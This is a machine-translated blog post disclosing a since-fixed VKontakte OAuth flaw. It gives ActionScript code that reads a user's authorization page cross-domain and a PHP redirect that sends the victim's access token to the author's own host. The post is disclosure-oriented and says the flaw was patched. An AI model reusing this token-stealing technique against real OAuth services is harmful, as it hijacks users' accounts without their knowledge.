We get access to the methods of Api Vkontakte without the user's knowledge

Introduction

This vulnerability was found by me about two months ago, or even more.
Then the information was sent to the developers, and they successfully fixed it.
As it seemed to me at that time.

It soon became clear that they did not fix it at all, but simply limited access to the messages, which I paid attention to the developers at that time.

The process of obtaining access, I will try to describe in sufficient detail under the cut.

Search

Actually, the idea that it is possible to access api without the knowledge of the user appeared almost immediately, as soon as I started working with methods for Standalone applications.
At that time, VK was already using oauth authentication.
')
There was nothing particularly ingenious, just oauth authorization was on the same domain with api 2.0, and accordingly, with the crossdomain.xml file, which allows you to perform queries from any server.

Without hesitation, I started writing the implementation.

Using

Immediately warn readers about two things:

• My way may seem a little strange.
• My code is very bydlovat, but, unfortunately, I do not know how else.

My insidious cunning plan meant that the user would be sent to a flash application that sgitit authorization page, and then sparsit link for authorization.

Go.

Point one is the flash application.

Since flash drives can perform free cross-domain queries wherever there is an appropriate crossdomain.xml, this was the only way to get a link to authorization neatly.

The flash drive code is straightforward, and this is probably the hardest part, at least for me, because ActionScript I practically do not know.

import flash.net.URLLoader; import flash.net.URLRequest; import flash.events.Event; var auth_page = new URLLoader(); this.addEventListener( Event.ADDED_TO_STAGE, onAddedToStage ); function onAddedToStage(e: Event): void { auth_page.addEventListener(Event.COMPLETE, auth_load); //   auth_page.load(new URLRequest('http://api.vkontakte.ru/oauth/authorize?client_id=2725857&scope=offline,ads,notifications,groups,wall,questions,offers,pages,notes,docs,video,audio,photos,friends,notifi&redirect_uri=http://api.vk.com/blank.html&display=page&response_type=token')); } function auth_load(e:Event):void { var wrapper: Object = Object(parent.parent); var auth_str = auth_page.data; trace(); //   iframe ,       wrapper.external.navigateToURL(new URLRequest('http://vkontakte.ru/app2725881#'+auth_str.toString().substr(auth_str.indexOf("location.href")+17, 162))); } 

There is one little trick.
Just because the flash application redirektit can not, because of browser security policies.
But VC has, or rather was, now it was removed from the docks, a special method for redirecting the user to the page inside VKontakte.
This was not a particular problem, however, because There are iframe applications that can redirect wherever they want.

The second point is the iframe application.

In the iframe application, we need to redirect the user to the specified url, making a couple of replacements.

 <? header('Location: '.str_replace(array('https','blank.html'), array('http', '//thecops.ru/hi.php'), $_GET['hash']))); ?> 

On this you can and finish.
On the hi.php page, we get access_token, with permissions to all methods except messages.

A good example, you can see here .
Thanks for attention.
UPD:
Fix made, while very quickly.
The example is no longer valid.